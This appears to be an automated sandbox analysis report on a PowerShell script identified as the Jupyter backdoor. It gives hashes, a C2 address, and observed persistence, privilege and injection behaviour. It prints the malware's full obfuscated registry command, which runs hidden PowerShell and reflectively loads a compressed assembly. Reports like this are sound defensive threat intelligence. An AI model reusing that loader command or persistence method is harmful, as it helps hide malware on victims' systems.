Analysis
max time kernel: 642s
max time network: 653s
platform: windows10-1703_x64
resource: win10-20230220-en
resource tags: arch:x64, arch:x86, image:win10-20230220-en, locale:en-us, os:windows10-1703-x64, system
submitted: 13-04-2023 14:26
Static task: static1
General
Target: script.ps1
Size: 28KB
MD5: 5201bec05304172eb34578a483da40da
SHA1: e4a91fd21e16639f759009a17e1f37df5c89f2b4
SHA256: 5a2366fb3d365e87f77a982d83eefb5054d50e8e73d2043979e5616c7071a458
SHA512: 7ea8de19029a90502fd6a472e1b449cdbf017a19e679d3383b34aea2af1e392de6216934640fd9d8c47fb8553759cde0880291ff2d187081ff9896746a276353
SSDEEP: 768:gPPLA+zYgibawLt4CGwmGGler9PdnH1LiGK:eT7zgbaItpdmGKyxdnViR
Malware Config
Extracted
Family: jupyter (OC-8)
C2: http://37.221.114.23
Signatures
Jupyter Backdoor/Client payload (1 IoC)
  resource: behavioral1/memory/4452-362-0x000001C9471E0000-0x000001C9471F2000-memory.dmp
  yara_rule: family_jupyter
Blocklisted process makes network request (21 IoCs)
  flows 2, 8, 9, 11, 12, 13, 14, 15, 16, 17, 27, 28, 30, 31, 32, 33, 34, 35, 36, 37, 38, all from pid 4452 powershell.exe
Drops startup file (1 IoC)
  File created: C:\Users\Admin\AppData\Roaming\MICrosoft\WIndoWs\STARt meNU\pROgraMs\STArTUP\a666a8fda214cd9238e7fd9c62da9.lnk (powershell.exe)
Modifies registry class (7 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\.zgfdlkdwjy (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\.zgfdlkdwjy\ = "nfivyqigfpw" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open\command (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open\command\ = "poweRsHeLl -WIndOwsTYlE hiDdeN -Ep BYPass -cOMMand \"[sYStem.RefLeCtIoN.AsSembly]::loaD({$a0aa7c41ff34f981c548499da1e4a=NEw-oBJECT syStEm.iO.MemorYSTREAm(, $aRgS[0]);$a42eb79b0134e6981a8104636b9ca=NeW-OBjECt sYSTEM.iO.mEmorYsTrEam;$ad54b764e9845ab4de9dea2a69505=nEW-oBJecT SyStem.iO.COMPReSsiON.GZIPStREAm $a0aa7c41ff34f981c548499da1e4a, ([iO.cOmpreSsiOn.COmprESSIoNMOdE]::dEcOmpReSs);$ad54b764e9845ab4de9dea2a69505.CoPytO($a42eb79b0134e6981a8104636b9ca);$ad54b764e9845ab4de9dea2a69505.cLosE();$a0aa7c41ff34f981c548499da1e4a.ClosE();retuRn $a42eb79b0134e6981a8104636b9ca.tOaRraY();}.iNvOke([SysTeM.io.FiLe]::readalLbYTes('C:\\Users\\Admin\\AppData\\Roaming\\AdOBE\\IUAhWSYnwacetBJkHpG\\JYrgHGeXzFaift.YLMrkBnbRWCVeEFGZ')));[a0cb94b33de41cafdb3b130fc96f7.a1dc1fc073f4b6be3d290facb90f5]::a2197eb87d64aa8dada0c2f713e48()\"" (powershell.exe)
Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid 4452 powershell.exe (6 occurrences)
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, pid 4452 powershell.exe
Suspicious use of WriteProcessMemory (4 IoCs)
  PID 4452 (powershell.exe) wrote to memory of 2568, procid_target 67
  PID 4452 (powershell.exe) wrote to memory of 2568, procid_target 67
  PID 2568 (csc.exe) wrote to memory of 3576, procid_target 68
  PID 2568 (csc.exe) wrote to memory of 3576, procid_target 68
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1
  - Blocklisted process makes network request
  - Drops startup file
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 4452
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.cmdline"
    - Suspicious use of WriteProcessMemory
    PID: 2568
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES618D.tmp" "c:\Users\Admin\AppData\Local\Temp\lajkrkag\CSC8B4757A9AC8448BA5D5FEBD2A61AC.TMP"
      PID: 3576
Downloads